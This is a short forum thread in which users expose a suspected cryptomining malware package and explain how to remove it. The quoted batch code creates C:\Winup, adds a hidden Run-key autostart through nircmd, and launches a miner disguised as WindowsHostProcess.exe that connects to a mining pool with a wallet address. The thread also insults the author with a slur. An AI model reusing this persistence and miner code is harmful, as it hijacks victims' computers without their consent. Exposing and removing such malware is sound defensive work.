.....well You have joined Sep 2017 and have 2 posts :D
Nice malware retard,
wtf is this fail garbage
Code:
SET INSTALLPATH=C:\Winup
mkdir %INSTALLPATH%
copy *Install.bat* %INSTALLPATH%
copy *nircmd.exe* %INSTALLPATH%
copy *start.bat* %INSTALLPATH%
copy *WindowsHostProcess.exe* %INSTALLPATH%
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Winup" /d "\"C:\Winup\nircmd.exe\" exec hide \"C:\Winup\start.bat\"" /f
start %INSTALLPATH%\nircmd.exe exec hide %INSTALLPATH%\start.bat
Code:
C:\Winup\WindowsHostProcess.exe -a tribus -o stratum+tcp://pool.hashbag.cc:8688 -u DG2HijzNeC4mdBUpTYRGmsyWBPt4sNTwUG -p xx
So to clean it up end those processes with task manager
WindowsHostProcess.exe
nircmd.exe
delete the folder
C:\Winup\
Its only a bitcoin miner. This guy must in desperate times. so sad lol
PRT thank you for that Information!